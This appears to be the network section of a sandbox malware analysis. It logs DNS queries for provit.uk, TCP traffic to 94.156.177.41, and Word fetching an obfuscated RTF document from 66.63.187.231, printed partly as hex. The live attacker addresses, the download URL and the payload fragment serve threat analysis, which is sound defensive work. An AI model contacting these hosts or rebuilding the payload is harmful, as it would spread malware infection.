                                                Nov 20, 2024 10:13:05.559942007 CET804926394.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:05.693496943 CET4926480192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:05.701008081 CET804926494.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:05.701095104 CET4926480192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:05.702789068 CET4926480192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:05.710263014 CET804926494.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:05.710359097 CET4926480192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:05.718780994 CET804926494.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:06.563930035 CET804926494.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:06.564081907 CET4926480192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:06.564234018 CET804926494.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:06.564368010 CET4926480192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:06.568943024 CET804926494.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:06.701910019 CET4926580192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:06.707001925 CET804926594.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:06.707206964 CET4926580192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:06.709011078 CET4926580192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:06.715912104 CET804926594.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:06.715979099 CET4926580192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:06.721139908 CET804926594.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:07.564760923 CET804926594.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:07.564935923 CET4926580192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:07.565009117 CET804926594.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:07.565052032 CET4926580192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:07.572721958 CET804926594.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:07.690493107 CET4926680192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:07.698745966 CET804926694.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:07.698832035 CET4926680192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:07.719913006 CET4926680192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:07.728288889 CET804926694.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:07.728341103 CET4926680192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:07.736788034 CET804926694.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:08.449316978 CET804926694.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:08.449518919 CET4926680192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:08.449672937 CET804926694.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:08.449727058 CET4926680192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:08.454411030 CET804926694.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:08.580527067 CET4926780192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:08.588155031 CET804926794.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:08.588236094 CET4926780192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:08.590316057 CET4926780192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:08.595607996 CET804926794.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:08.595685959 CET4926780192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:08.601305008 CET804926794.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:09.331041098 CET804926794.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:09.331053972 CET804926794.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:09.331161976 CET4926780192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:09.331197023 CET4926780192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:09.336369991 CET804926794.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:09.466706991 CET4926880192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:09.474982977 CET804926894.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:09.475083113 CET4926880192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:09.476685047 CET4926880192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:09.484504938 CET804926894.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:09.484579086 CET4926880192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:09.492249012 CET804926894.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:10.215668917 CET804926894.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:10.215842009 CET4926880192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:10.215883017 CET804926894.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:10.215930939 CET4926880192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:10.224674940 CET804926894.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:10.343473911 CET4926980192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:10.353955984 CET804926994.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:10.354067087 CET4926980192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:10.355726957 CET4926980192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:10.363971949 CET804926994.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:10.364041090 CET4926980192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:10.372134924 CET804926994.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:11.234061956 CET804926994.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:11.234113932 CET804926994.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:11.234164953 CET4926980192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:11.236413002 CET4926980192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:11.239377022 CET804926994.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:11.370659113 CET4927080192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:11.376260996 CET804927094.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:11.376352072 CET4927080192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:11.377935886 CET4927080192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:11.382894039 CET804927094.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:11.382962942 CET4927080192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:11.387973070 CET804927094.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:12.128077984 CET804927094.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:12.128248930 CET804927094.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:12.128276110 CET4927080192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:12.128334045 CET4927080192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:12.133372068 CET804927094.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:12.260628939 CET4927180192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:12.265649080 CET804927194.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:12.265732050 CET4927180192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:12.267328978 CET4927180192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:12.272383928 CET804927194.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:12.272453070 CET4927180192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:12.278081894 CET804927194.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:13.149569035 CET804927194.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:13.149835110 CET804927194.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:13.149899960 CET4927180192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:13.149919033 CET4927180192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:13.154951096 CET804927194.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:13.274080038 CET4927280192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:13.282968998 CET804927294.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:13.283068895 CET4927280192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:13.284693003 CET4927280192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:13.292524099 CET804927294.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:13.292586088 CET4927280192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:13.299957991 CET804927294.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:14.047805071 CET804927294.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:14.047995090 CET4927280192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:14.048101902 CET804927294.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:14.048187971 CET4927280192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:14.053592920 CET804927294.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:14.179020882 CET4927380192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:14.184887886 CET804927394.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:14.184964895 CET4927380192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:14.186636925 CET4927380192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:14.191806078 CET804927394.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:14.191870928 CET4927380192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:14.197151899 CET804927394.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:14.920927048 CET804927394.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:14.921544075 CET804927394.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:14.921761036 CET4927380192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:14.924352884 CET4927380192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:14.931750059 CET804927394.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:15.052736044 CET4927480192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:15.058866978 CET804927494.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:15.059078932 CET4927480192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:15.060734987 CET4927480192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:15.065860033 CET804927494.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:15.065941095 CET4927480192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:15.070830107 CET804927494.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:15.927126884 CET804927494.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:15.927279949 CET804927494.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:15.927412987 CET4927480192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:15.927529097 CET4927480192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:15.934391975 CET804927494.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:16.067698002 CET4927580192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:16.072551966 CET804927594.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:16.072634935 CET4927580192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:16.074276924 CET4927580192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:16.079170942 CET804927594.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:16.079240084 CET4927580192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:16.084203005 CET804927594.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:16.829201937 CET804927594.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:16.829313993 CET4927580192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:16.829422951 CET804927594.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:16.829473972 CET4927580192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:16.839437962 CET804927594.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:16.999209881 CET4927680192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:17.007487059 CET804927694.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:17.007554054 CET4927680192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:17.009215117 CET4927680192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:17.017268896 CET804927694.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:17.017319918 CET4927680192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:17.022243023 CET804927694.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:17.903618097 CET804927694.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:17.903681993 CET804927694.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:17.903806925 CET4927680192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:17.903897047 CET4927680192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:17.908765078 CET804927694.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:18.044982910 CET4927780192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:18.050030947 CET804927794.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:18.050131083 CET4927780192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:18.051748037 CET4927780192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:18.056602001 CET804927794.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:18.056701899 CET4927780192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:18.061819077 CET804927794.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:18.831449032 CET804927794.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:18.831497908 CET804927794.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:18.831569910 CET4927780192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:18.831645012 CET4927780192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:18.840853930 CET804927794.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:18.972600937 CET4927880192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:18.977886915 CET804927894.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:18.977967024 CET4927880192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:18.979660034 CET4927880192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:18.985649109 CET804927894.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:18.985728025 CET4927880192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:18.991456985 CET804927894.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:19.881263971 CET804927894.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:19.881369114 CET4927880192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:19.881414890 CET804927894.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:19.881458998 CET4927880192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:19.886547089 CET804927894.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:20.013690948 CET4927980192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:20.021190882 CET804927994.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:20.021389008 CET4927980192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:20.023081064 CET4927980192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:20.030540943 CET804927994.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:20.030600071 CET4927980192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:20.038060904 CET804927994.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:20.786156893 CET804927994.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:20.786261082 CET4927980192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:20.786345959 CET804927994.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:20.786398888 CET4927980192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:20.791119099 CET804927994.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:21.121294975 CET4928080192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:21.126986027 CET804928094.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:21.128859997 CET4928080192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:21.130464077 CET4928080192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:21.135622025 CET804928094.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:21.135704994 CET4928080192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:21.142750978 CET804928094.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:21.864723921 CET804928094.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:21.865251064 CET804928094.156.177.41192.168.2.22
                                                Nov 20, 2024 10:13:21.865362883 CET4928080192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:21.865447998 CET4928080192.168.2.2294.156.177.41
                                                Nov 20, 2024 10:13:21.870501041 CET804928094.156.177.41192.168.2.22
                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 20, 2024 10:11:02.410587072 CET5456253192.168.2.228.8.8.8
                                                Nov 20, 2024 10:11:02.437133074 CET53545628.8.8.8192.168.2.22
                                                Nov 20, 2024 10:11:04.042215109 CET5291753192.168.2.228.8.8.8
                                                Nov 20, 2024 10:11:04.050035000 CET53529178.8.8.8192.168.2.22
                                                Nov 20, 2024 10:11:04.051914930 CET6275153192.168.2.228.8.8.8
                                                Nov 20, 2024 10:11:04.066126108 CET53627518.8.8.8192.168.2.22
                                                Nov 20, 2024 10:11:08.334944963 CET5789353192.168.2.228.8.8.8
                                                Nov 20, 2024 10:11:08.346334934 CET53578938.8.8.8192.168.2.22
                                                Nov 20, 2024 10:11:08.347850084 CET5482153192.168.2.228.8.8.8
                                                Nov 20, 2024 10:11:08.356476068 CET53548218.8.8.8192.168.2.22
                                                Nov 20, 2024 10:11:09.434897900 CET5471953192.168.2.228.8.8.8
                                                Nov 20, 2024 10:11:09.442229033 CET53547198.8.8.8192.168.2.22
                                                Nov 20, 2024 10:11:09.443550110 CET4988153192.168.2.228.8.8.8
                                                Nov 20, 2024 10:11:09.471152067 CET53498818.8.8.8192.168.2.22
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Nov 20, 2024 10:11:02.410587072 CET192.168.2.228.8.8.80xa46eStandard query (0)provit.ukA (IP address)IN (0x0001)false
                                                Nov 20, 2024 10:11:04.042215109 CET192.168.2.228.8.8.80xe24dStandard query (0)provit.ukA (IP address)IN (0x0001)false
                                                Nov 20, 2024 10:11:04.051914930 CET192.168.2.228.8.8.80xaf7fStandard query (0)provit.ukA (IP address)IN (0x0001)false
                                                Nov 20, 2024 10:11:08.334944963 CET192.168.2.228.8.8.80x1100Standard query (0)provit.ukA (IP address)IN (0x0001)false
                                                Nov 20, 2024 10:11:08.347850084 CET192.168.2.228.8.8.80x2664Standard query (0)provit.ukA (IP address)IN (0x0001)false
                                                Nov 20, 2024 10:11:09.434897900 CET192.168.2.228.8.8.80xd97eStandard query (0)provit.ukA (IP address)IN (0x0001)false
                                                Nov 20, 2024 10:11:09.443550110 CET192.168.2.228.8.8.80x9c5bStandard query (0)provit.ukA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Nov 20, 2024 10:11:02.437133074 CET8.8.8.8192.168.2.220xa46eNo error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                Nov 20, 2024 10:11:04.050035000 CET8.8.8.8192.168.2.220xe24dNo error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                Nov 20, 2024 10:11:04.066126108 CET8.8.8.8192.168.2.220xaf7fNo error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                Nov 20, 2024 10:11:08.346334934 CET8.8.8.8192.168.2.220x1100No error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                Nov 20, 2024 10:11:08.356476068 CET8.8.8.8192.168.2.220x2664No error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                Nov 20, 2024 10:11:09.442229033 CET8.8.8.8192.168.2.220xd97eNo error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                Nov 20, 2024 10:11:09.471152067 CET8.8.8.8192.168.2.220x9c5bNo error (0)provit.uk198.244.140.41A (IP address)IN (0x0001)false
                                                • provit.uk
                                                • 66.63.187.231
                                                • 94.156.177.41
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.224916766.63.187.231803292C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                TimestampBytes transferredDirectionData
                                                Nov 20, 2024 10:11:12.726342916 CET493OUTGET /xampp/wer/we/seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns.doc HTTP/1.1
                                                Accept: */*
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                                UA-CPU: AMD64
                                                Accept-Encoding: gzip, deflate
                                                Host: 66.63.187.231
                                                Connection: Keep-Alive
                                                Nov 20, 2024 10:11:13.454144001 CET1236INHTTP/1.1 200 OK
                                                Date: Wed, 20 Nov 2024 09:11:13 GMT
                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                Last-Modified: Wed, 20 Nov 2024 01:43:14 GMT
                                                ETag: "3ecb0-6274e45e8a3e9"
                                                Accept-Ranges: bytes
                                                Content-Length: 257200
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: application/msword
                                                Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 0d 0d 0d 09 09 09 09 7b 5c 2a 5c 70 6e 61 69 75 34 37 32 36 33 32 38 32 30 20 5c 22 7d 0d 7b 5c 36 34 32 30 33 39 35 39 32 39 35 39 38 5f 26 3d 29 40 3f 3d 37 28 40 30 36 3f 33 25 25 27 28 3f 3f 2d 27 3e 60 31 3c 2e 24 30 27 38 7c 60 5f 5b b0 3f 30 5d 25 5f a7 3a 40 26 5e 38 a7 2e 31 b0 7c b5 b0 34 33 3f 3e 5f 39 36 3f 3d 3f 21 b5 25 3d 23 3f 25 7e 2f 3b 21 2b 28 2c 23 5e 25 60 24 21 21 3f 30 3f 21 5d 25 3c 30 2d 30 30 3e 29 21 b0 34 33 7c 3f 36 24 2e 3f 3a 24 23 5b 24 b5 3e 39 3a 5e 5e 26 24 b5 2a 3c 2f 35 7e 2d 28 2c 5d 3a 5e 2a 33 3c 3b 3b 37 21 2b 35 2f 5e b0 3f 3b 24 2d 3c 28 a7 33 a7 3d 37 31 5b 3f 3f a7 38 36 2b 30 36 3b 24 27 38 34 35 2a 3f 3c 28 3f 36 40 60 21 5f 37 3f 2c 40 3b 2d 40 26 2d 33 25 5f 26 2d 39 26 24 25 30 5f 25 21 3a 3f 27 3f 5b 60 3a 3f 39 26 2f 3f 26 3f 31 60 a7 33 2e 3f 27 37 25 3f 38 3d 5f 60 37 30 29 34 3f 2d 36 5b 30 24 35 60 60 a7 7c 7c 25 7e 2b 24 32 a7 36 28 29 2f 30 3d 2e 31 30 2e 39 a7 2e 3f 23 38 36 3c 3f 25 37 2a 5f 3e 3a 31 3f 3f 5f 2f [TRUNCATED]
                                                Data Ascii: {\rtf1{\*\pnaiu472632820 \"}{\6420395929598_&=)@?=7(@06?3%%'(??-'>`1<.$0'8|`_[?0]%_:@&^8.1|43?>_96?=?!%=#?%~/;!+(,#^%`$!!?0?!]%<0-00>)!43|?6$.?:$#[$>9:^^&$*</5~-(,]:^*3<;;7!+5/^?;$-<(3=71[??86+06;$'845*?<(?6@`!_7?,@;-@&-3%_&-9&$%0_%!:?'?[`:?9&/?&?1`3.?'7%?8=_`70)4?-6[0$5``||%~+$26()/0=.10.9.?#86<?%7*_>:1??_/2~4)+5(%^#149:.^=7+&'`.4?/11?_+0=%`+~:?*'[?%^#?4=,,_`|??.$6#*%>&>;)+4?9?0?~&-`'??8)8%.<'=.#9#3-'5:*$%%[6*[:1##.@=&3&=5`5??8/-8&[^?=?.|^/?&~(]/#<~9[8??4]+%@@%.2-64><1>`(70?|8`$?1,~[^8?0)?=;,?#>:9=%;?%=^0<$9)%&-4([&`?44*8|2[;+~<7#-*<67]651470.`[??=)01+@12~#['3?=7??0+~?,&88[?%],23$'[?,3%>@-&??%??[3+1.@@=!193)%?<([%.?%:)(/:9[$*??&-4[?!#2;8*:4=2]-%^+'=?+!$?26^%:|'`:_)/~|;]/]6'/-@2?~2.?#:'%&-5%~5/[*.^84??(.|^:[@7=8]!'7<(|?|1^.`#|-^80?3?3|#??||~.7$#8;?.#7=?%&?=[$92(_@?([)~$`99,#66)/2]_`*?@*#8]<@([?:;&7'$8>!*[3!?%1*;/08)=<`:$06.3?3|,0$>~:.[%,?~&?)
                                                Nov 20, 2024 10:11:13.454161882 CET224INData Raw: 7c 25 3a 27 3f 35 5d 5d 3e 34 2b 39 23 28 34 2d 2f 5d 3f 29 34 5f 29 33 21 2a b0 37 26 24 3f 3f 3f 3f 3b 25 3f 3d 35 30 b5 5d 37 5f 25 27 30 26 3b 3f 32 5f 24 24 2b 7e 34 5b 32 2a 21 5e 3f 23 2c 24 3f 5d 21 2d 34 29 27 24 3d 3e 31 3c 36 33 27 b0
                                                Data Ascii: |%:'?5...4+9#(4-/]?)4_)3!*7&$????;%?=50]7_%'0&;?2_$$+~4[2*!^?#,$?]!-4)'$=>1<63'-<^85/??,.7>%^;[|*4,?[9235*.~|$?]#_?@,?8^=?>%]`[_>~.?^@]=?*#$>0?6,%~`[%???<,<;>](_1@!]<1???(;7&=*1:)9;)??:%-(.^9|^:#|;;^8&:;`[$086:'^,
                                                Nov 20, 2024 10:11:13.454174995 CET1236INData Raw: 3c 37 3f 5f 27 32 21 25 30 33 7e 3b 5b 3f 32 32 5f 2a 5d 7c 3d 3f 3b 37 2e 3f 23 24 2c 25 3f 5b 28 30 3b 5d 21 25 7c 24 28 3e 2d 2f 60 3f 40 2f b0 a7 26 b5 29 3b 40 2f 3a 21 5d 32 3c 3f 36 a7 2f 28 25 26 2f 33 2e 3d 3f 33 b5 5b 30 31 5e 3f 32 39
                                                Data Ascii: <7?_'2!%03~;[?22_*]|=?;7.?#$,%?[(0;]!%|$(>-/`?@/&);@/:!]2<?6/(%&/3.=?3[01^?29`^<9&?_=#.`8*^>1&_?])?6<;?(%`.9?!;(2~!339%2#`%!-|%4`?,23@^~$@?:0%6;2.,%#9?%%~#>@-?&:`&*=80@*_|<2(>*(',:(%,>7%65?[6|;:<%<(?>@6??4?].9%+_3:0~)#+%673
                                                Nov 20, 2024 10:11:13.454328060 CET1236INData Raw: 40 21 3b 32 33 5b 25 2b 3b 3a 60 5e 2a 31 3f 32 b0 7e 35 38 60 7c 26 3f 3f 5e 25 3f 34 3f 28 60 3e 27 30 2b 23 5b 37 29 3f 3c b0 3f 3f 36 31 3f 36 3f 5e 2b 7c 35 33 5d 38 38 b5 34 32 b0 b5 26 3f 3a 3f 39 3b 5b 23 40 2e 2c 40 2c 3f 60 3b 21 2f a7
                                                Data Ascii: @!;23[%+;:`^*1?2~58`|&??^%?4?(`>'0+#[7)?<??61?6?^+|53]8842&?:?9;[#@.,@,?`;!/=43@`~(?4?!&-5?%46(.%;'@!354>~/??:&%]4</=)5?;?;;?)4`_5<1)<:9^9235=4!<?<?_+'>+;?5,1&)2'`]@??,!(_~?-?;(2?|$6?8/7@:0/$*%)1!(?^17?6;>!7&,/1?^6*3$(;<=*;1
                                                Nov 20, 2024 10:11:13.454339981 CET1236INData Raw: 5e 33 3e 28 3f 3b 3b 3f 30 3b 3b 2a 2e 36 26 36 b0 a7 38 25 21 2b 26 3f 34 3d 2e 33 31 3f 5d 26 23 40 2b b5 24 23 3b 31 3d 5b 3f 3f 5f 23 27 7c 7e 7e 2c 30 23 23 35 7e 32 2a 37 3f 33 33 3f 36 31 7e 27 27 7c 2e 7e 23 2a b0 39 3f 35 3f 3f 2a a7 25
                                                Data Ascii: ^3>(?;;?0;;*.6&68%!+&?4=.31?]&#@+$#;1=[??_#'|~~,0##5~2*7?33?61~''|.~#*9?5??*%707!8?<^<'?7/0=,$7`+%~>20>?/#<-../?(?@/^>#0'44@<8_8|->?:?|;-)4'.?2'4:!-?68?/$5]0<4!?__~35716_@_>??!:3#/:)048>%#.!??.%4$?-$6?%[%(&:%3~))?2,/(%3|':|05/6,&+
                                                Nov 20, 2024 10:11:13.454349995 CET672INData Raw: 2a 5f 2b 3b 3c 34 30 28 37 5d 3c 27 3b 2d 5e 3c 24 2d 3f 38 3f 3d 3f 7e 25 2a 2a 5b 30 5d 27 b0 33 38 40 7c 25 3f 5b 25 3f 60 30 28 b5 2d 25 5d 29 5e 30 5d 36 60 b5 39 3f 29 3f 25 37 27 21 2a 30 31 b0 5b b0 35 2c 32 31 28 5e 25 3f 38 3f 30 2c 32
